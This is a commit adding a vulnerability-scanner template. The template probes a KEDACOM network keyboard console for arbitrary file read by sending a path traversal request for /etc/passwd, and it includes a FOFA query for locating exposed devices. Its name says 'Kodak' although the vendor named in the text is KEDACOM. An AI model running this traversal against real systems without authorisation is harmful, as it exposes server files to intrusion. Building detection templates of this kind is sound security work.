Create kodak-network-lfi.yaml

patch-1
Dhiyaneshwaran 2023-08-04 22:26:25 +05:30 committed by GitHub
parent a2652caeb0
commit 7334dd614a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 38 additions and 0 deletions

View File

@ -0,0 +1,38 @@
id: kodak-network-lfi
info:
name: Kodak Network Keyboard Console - Arbitrary File Read
author: DhiyaneshDk
severity: high
description: |
There is an arbitrary file reading vulnerability in the KEDACOM network keyboard console. Attacking this vulnerability can read arbitrary information from the server
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E7%A7%91%E8%BE%BE%20%E7%BD%91%E7%BB%9C%E9%94%AE%E7%9B%98%E6%8E%A7%E5%88%B6%E5%8F%B0%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
metadata:
max-request: 1
fofa-query: "网络键盘控制台"
verified: true
tags: lfi,kodak,network
http:
- method: GET
path:
- "{{BaseURL}}/../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "text/html"
- "Server: kedacom-hs"
condition: and
- type: status
status:
- 200